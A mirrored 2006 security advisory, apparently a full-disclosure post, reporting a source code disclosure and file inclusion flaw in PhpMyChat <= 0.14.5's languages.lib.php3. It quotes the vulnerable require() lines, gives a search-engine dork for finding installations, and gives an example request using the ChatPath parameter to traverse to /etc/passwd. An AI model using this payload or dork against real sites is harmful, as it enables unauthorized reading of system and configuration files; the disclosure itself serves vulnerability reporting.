Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  gtcatalog <= 0.9.1 (index.php) Remote File Include Vulnerability

  LetterIt v2 (inc/session.
php) Remote File Include Vulnerability

  [Full-disclosure] RSS Injection in Sage part 2

  FreeWebshop <=2.2.2 [local file include & xss]

From:ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date:09.11.2006
Subject:PhpMyChat <= 0.14.5 Source Code Disclosure Vulnerability

*******************************************************************************
# Title  :  PhpMyChat  <= 0.14.5 Source Code Disclosure Vulnerability

# Author :   ajann

# Dork :   phpMyChat 0.14.5 , phpMyChat

# Vuln;

*******************************************************************************
[File]
localization/languages.lib.php3
[/File]

[Code,1]
languages.lib.php3 Error:

..
....
require("./${ChatPath}config/config.lib.php3");
require("./${ChatPath}lib/database/".C_DB_TYPE.".lib.
php3");
require("./${ChatPath}lib/clean.lib.php3");
....
..

Key [:] ChatPath=[file]

\Example:

http://target.com/path/localization/languages.lib.php3?ChatPath=../../etc/passwd


# ajann,Turkey
# ...
# Im not Hacker!

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server